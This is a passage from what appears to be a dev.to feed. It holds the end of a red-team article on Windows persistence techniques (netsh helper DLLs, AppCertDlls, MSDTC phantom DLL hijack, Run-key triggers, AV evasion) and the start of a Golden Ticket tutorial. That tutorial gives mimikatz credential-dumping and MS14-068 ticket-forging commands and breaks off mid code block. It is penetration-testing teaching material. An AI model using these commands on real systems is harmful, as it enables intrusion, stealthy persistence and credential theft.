&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qvtaqxqfp1i115gwh56.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qvtaqxqfp1i115gwh56.png" alt=" " width="800" height="290"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After reboot, the malicious DLL is automatically loaded into &lt;code&gt;spoolsv.exe&lt;/code&gt;, offering high stealth:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp37l5a4889qg3bh7h6ec.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp37l5a4889qg3bh7h6ec.png" alt=" " width="800" height="676"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The C2 session is established with SYSTEM privileges (MSF is used here for demonstration; a CS DLL would need to be rewritten):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt7pjdge94knb5fk41ma.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt7pjdge94knb5fk41ma.png" alt=" " width="800" height="234"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  0x08 Netsh
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Fully elevated (high‑integrity) administrator – both the helper registration and the HKLM Run value used below are machine‑wide, so a UAC‑restricted token is not sufficient.&lt;br&gt;&lt;br&gt;
Netsh is a native Windows command‑line tool for network configuration. It can be extended with helper DLLs; once a helper is registered its path is written to the registry, so netsh loads it on every subsequent start:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7z75qxexmvs0x3s358rk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7z75qxexmvs0x3s358rk.png" alt=" " width="799" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thus, persistence can be achieved by importing a helper DLL. The command format is:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;netsh add helper [Absolute evil DLL path]&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;However, netsh is not started automatically, so a trigger is needed as well – here a conventional HKLM Run value. Note that this Run value is precisely the kind of entry Autoruns and similar tools list: the stealthy part of the technique is the in‑process helper DLL load, not the trigger, so in a real engagement a less conspicuous trigger (or one of the other techniques in this article) should be used to launch netsh:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "cmd /c C:\Windows\System32\netsh"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After reboot, the shell is still obtained:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7qx5cilt2g8doe01loxn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7qx5cilt2g8doe01loxn.png" alt=" " width="798" height="228"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The process tree and loaded malicious module are shown below; stealth is relatively high:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bq01393fi3cyb71suo3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bq01393fi3cyb71suo3.png" alt=" " width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Because the testing still relied on an MSF‑generated DLL, launching netsh pops up a console window and blocks; terminating the netsh process drops the connection. Therefore, for practical red‑team use, a custom DLL must be developed.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x09 AppCertDlls
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Fully elevated (high‑integrity) administrator – the key is under HKLM, so a UAC‑restricted token is not sufficient.&lt;br&gt;&lt;br&gt;
It is well known that the &lt;code&gt;AppInit_DLLs&lt;/code&gt; registry value is read when &lt;code&gt;user32.dll&lt;/code&gt; is loaded into memory; if a value exists, &lt;code&gt;LoadLibrary()&lt;/code&gt; is called to load the user‑mode DLL. In earlier years, this method was quite popular for DLL‑injection persistence, but it has become ineffective on many modern systems. The reason is a flag check in &lt;code&gt;kernel32.dll&lt;/code&gt; during startup, as illustrated:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdtt54ow4yl28fpao9b9h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdtt54ow4yl28fpao9b9h.png" alt=" " width="660" height="196"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;kernel32.dll&lt;/code&gt; queries class &lt;code&gt;0x67&lt;/code&gt; via &lt;code&gt;NtQuerySystemInformation&lt;/code&gt; and then checks whether the &lt;code&gt;ReturnLength&lt;/code&gt; is equal to 2 (bitwise AND operation). If equal, it skips loading the DLL and returns.&lt;br&gt;&lt;br&gt;
Information regarding &lt;code&gt;0x67&lt;/code&gt; can be found online:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1x904lep5rtgkb9mv1sp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1x904lep5rtgkb9mv1sp.png" alt=" " width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This flag is toggled by &lt;code&gt;bcdedit.exe /set testsigning on/off&lt;/code&gt;. However, most recent machines ship with Secure Boot enabled in the UEFI firmware, and test signing cannot be switched on while Secure Boot is active; unless Secure Boot is disabled, the flag cannot be changed and &lt;code&gt;AppInit_DLLs&lt;/code&gt; stays inert. Consequently, this method is of very limited use on current hardware.&lt;br&gt;&lt;br&gt;
Nevertheless, there is another, less commonly used key that also causes DLLs to be loaded automatically: &lt;code&gt;AppCertDlls&lt;/code&gt; (under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager&lt;/code&gt;). Whenever a process calls &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLogonW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; or &lt;code&gt;WinExec&lt;/code&gt;, the DLLs listed in this key are loaded into that calling process. Many programmes call these APIs, so the DLL ends up in a wide range of processes – which is also why a DLL that misbehaves here can break the whole session (see below).&lt;br&gt;&lt;br&gt;
A test programme calling one of these APIs:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8iozg4eqdaobcovqixr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8iozg4eqdaobcovqixr.png" alt=" " width="779" height="680"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Execution:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff52gm9bo8w2rwhiqfy69.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff52gm9bo8w2rwhiqfy69.png" alt=" " width="519" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;MSF session established:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvu6t3wtj9ba8eiyvd27z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvu6t3wtj9ba8eiyvd27z.png" alt=" " width="800" height="115"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the process tree:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9usy1xtesmz3qhoo4oa5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9usy1xtesmz3qhoo4oa5.png" alt=" " width="799" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It merely spawns a &lt;code&gt;rundll32.exe&lt;/code&gt; under a legitimate process, loading the malicious DLL. Stealth is high.&lt;br&gt;&lt;br&gt;
However, the MSF DLL remains usable only for testing. Because many system programmes call these APIs (e.g. &lt;code&gt;explorer.exe&lt;/code&gt;), and the MSF DLL blocks the process, it can prevent the desktop from loading at startup. Therefore, a custom DLL must be developed for operational use.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x0A MSDTC
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Fully elevated (high‑integrity) administrator – writing into &lt;code&gt;System32&lt;/code&gt; and changing a service's start type both require it.&lt;br&gt;&lt;br&gt;
&lt;code&gt;msdtc.exe&lt;/code&gt; is the Microsoft Distributed Transaction Coordinator service. It coordinates transactions that span several resource managers and is used, for example, by Microsoft SQL Server and (historically) Microsoft Personal Web Server.&lt;br&gt;&lt;br&gt;
On start‑up the service attempts to load three DLLs from &lt;code&gt;System32&lt;/code&gt;: &lt;code&gt;oci.dll&lt;/code&gt;, &lt;code&gt;SQLLib80.dll&lt;/code&gt; and &lt;code&gt;xa80.dll&lt;/code&gt;. The service entry is shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjim1hkwn9un4rwd6fl7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjim1hkwn9un4rwd6fl7.png" alt=" " width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The corresponding registry entries:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzmfiz64ybhsyk37b9sw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzmfiz64ybhsyk37b9sw.png" alt=" " width="800" height="348"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In a default Windows installation &lt;code&gt;oci.dll&lt;/code&gt; does not exist in &lt;code&gt;System32&lt;/code&gt;, so this is a classic missing‑DLL ("phantom DLL") hijack: an attacker with write access to that directory – i.e. an elevated administrator – can drop a DLL of that name, and it will be loaded and its code executed inside the service every time MSDTC starts. For defenders, the appearance of an &lt;code&gt;oci.dll&lt;/code&gt; in &lt;code&gt;System32&lt;/code&gt;, or a change of the MSDTC start type, is the artefact to alert on.&lt;br&gt;&lt;br&gt;
The service's start type is "Manual" by default; check it and switch it to automatic with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;qc&lt;/span&gt; &lt;span class="kd"&gt;msdtc&lt;/span&gt;
&lt;span class="nb"&gt;sc&lt;/span&gt; &lt;span class="kd"&gt;config&lt;/span&gt; &lt;span class="kd"&gt;msdtc&lt;/span&gt; &lt;span class="nb"&gt;start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;auto&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The malicious DLL will be loaded into the &lt;code&gt;msdtc.exe&lt;/code&gt; process, yielding high stealth:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37csufc6hx3qth3fqzv2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37csufc6hx3qth3fqzv2.png" alt=" " width="800" height="588"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  0x0B Conclusion
&lt;/h2&gt;

&lt;p&gt;Initially, approximately twenty persistence techniques were catalogued, but in practice many are not universally applicable—some are limited to specific scenarios, particular configurations, or certain applications. Others are "passive" persistence methods, such as shortcut replacement; aside from exploiting a shortcut vulnerability, they will not trigger unless the target clicks them. Therefore, those with significant limitations were removed to streamline the article (and reduce workload), resulting in the ten techniques presented above, which are relatively generic.&lt;br&gt;&lt;br&gt;
During the collation process, a frustration at the Ring3 level became evident: user‑mode persistence that aims for high stealth and evasion of behavioural detection by anti‑virus must rely on native Windows functionality (living off the land). If these features or modules are disabled, uninstalled, or fail to start normally in special environments, the approach becomes problematic. Thus, preparing multiple methods is always beneficial.&lt;br&gt;&lt;br&gt;
Due to time constraints, some DLLs required for demonstration were directly generated by MSF, but their evasion capabilities are unsatisfactory. When developing the CS plugin later, these DLLs must be completed and subjected to further anti‑virus treatment.&lt;/p&gt;

</description>
      <category>windows</category>
      <category>persistence</category>
      <category>cybersecurity</category>
      <category>techniques</category>
    </item>
    <item>
      <title>Ticket Passing Attacks</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 10 Jun 2026 03:06:18 +0000</pubDate>
      <link>https://dev.to/excalibra/ticket-passing-attacks-f77</link>
      <guid>https://dev.to/excalibra/ticket-passing-attacks-f77</guid>
      <description>&lt;p&gt;This section introduces two common attack methods within a domain: the Golden Ticket and the Silver Ticket.&lt;/p&gt;

&lt;p&gt;Readers already familiar with the Kerberos authentication flow will find the principles behind these two attacks considerably easier to follow. Those who have not yet studied it are advised to read up on the Kerberos authentication process first.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Related Tools&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068" rel="noopener noreferrer"&gt;Ms14‑068&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe" rel="noopener noreferrer"&gt;PSexec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/gentilkiwi/mimikatz/" rel="noopener noreferrer"&gt;mimikatz&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Golden Ticket
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Principle
&lt;/h3&gt;

&lt;p&gt;During Kerberos authentication, after the Client authenticates with the Authentication Service (AS), the AS issues a Logon Session Key and a Ticket‑Granting Ticket (TGT) to the Client. The Logon Session Key is not retained within the Key Distribution Centre (KDC), whereas the NTLM hash of the &lt;code&gt;krbtgt&lt;/code&gt; account is fixed. Consequently, if an attacker obtains the NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt;, it becomes possible to forge both a TGT and the corresponding Logon Session Key, thereby enabling the Client to proceed directly to the interaction with the Ticket‑Granting Service (TGS). Possession of a Golden Ticket permits the bypass of AS validation entirely; neither account name nor password is verified, and because the forgery depends only on the &lt;code&gt;krbtgt&lt;/code&gt; hash rather than on any user's password, the attacker remains unaffected even if the domain administrator password is subsequently changed.&lt;/p&gt;

&lt;h3&gt;
  
  
  Characteristics
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Does not require any interaction with the AS.&lt;/li&gt;
&lt;li&gt;Requires the NTLM hash of the &lt;code&gt;krbtgt&lt;/code&gt; user.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Detailed Procedure
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Forging Credentials to Escalate Privileges of a Domain User
&lt;/h4&gt;

&lt;p&gt;Assume that an attacker has logged on to a host within the domain as a local &lt;code&gt;Administrator&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4t6flxk0seonteslcxf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4t6flxk0seonteslcxf.png" alt=" " width="235" height="35"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;net config workstation&lt;/code&gt; reveals, among other details, that the domain is named &lt;code&gt;cyberpeace&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fphks358rtygyzxvchjkc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fphks358rtygyzxvchjkc.png" alt=" " width="599" height="232"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;nltest /dsgetdc:domain&lt;/code&gt; identifies the Domain Controller hostname as &lt;code&gt;scene&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvcq9w2rgf622sm7f6m09.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvcq9w2rgf622sm7f6m09.png" alt=" " width="423" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz is uploaded and executed with administrator privileges:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;mimikatz&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="s2"&gt;"privilege::debug"&lt;/span&gt; &lt;span class="s2"&gt;"sekurlsa::logonpasswords"&lt;/span&gt; &lt;span class="s2"&gt;"exit"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;log&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Examination of the generated &lt;code&gt;log.txt&lt;/code&gt; reveals a domain user account, &lt;code&gt;devuser&lt;/code&gt;, with the password &lt;code&gt;HOTdev123456&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomah489t994ykpt7t680.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomah489t994ykpt7t680.png" alt=" " width="246" height="72"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Logging in as &lt;code&gt;devuser&lt;/code&gt; and running &lt;code&gt;whoami&lt;/code&gt; confirms the current user context.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fog0797dfke41zkikgl48.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fog0797dfke41zkikgl48.png" alt=" " width="150" height="21"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The presence of the MS14‑068 vulnerability (CVE‑2014‑6324, addressed by patch 3011780) is checked with the command &lt;code&gt;systeminfo | find "3011780"&lt;/code&gt;. An empty result indicates the patch is absent and the system is vulnerable. It should be noted that privilege escalation using this vulnerability is time‑limited.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdgcdepslpnsdush2r4n4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdgcdepslpnsdush2r4n4.png" alt=" " width="461" height="64"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;An attempt to access the administrative share on the domain controller with &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; fails owing to insufficient permissions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp4ipntgpaad5a3zbvz4u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp4ipntgpaad5a3zbvz4u.png" alt=" " width="535" height="46"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The MS14‑068 exploit tool and mimikatz are uploaded. The user’s SID is obtained using either &lt;code&gt;whoami /user&lt;/code&gt; or &lt;code&gt;whoami /all&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtco6b9r8ea5q33nguft.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtco6b9r8ea5q33nguft.png" alt=" " width="799" height="249"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The MS14‑068 tool is used to forge a ticket:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;C&lt;/span&gt;:\MS14&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;MS14&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;.exe &lt;span class="na"&gt;-u &lt;/span&gt;&lt;span class="kd"&gt;devuser&lt;/span&gt;@cyberpeace.com &lt;span class="na"&gt;-p &lt;/span&gt;&lt;span class="kd"&gt;HOTdev123456&lt;/span&gt; &lt;span class="na"&gt;-s &lt;/span&gt;&lt;span class="kd"&gt;S&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;21&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;97341123&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1865264218&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;933115267&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1108&lt;/span&gt; &lt;span class="na"&gt;-d &lt;/span&gt;&lt;span class="kd"&gt;scene&lt;/span&gt;.cyberpeace.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A TGT ticket file is generated in the current directory. The general usage is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
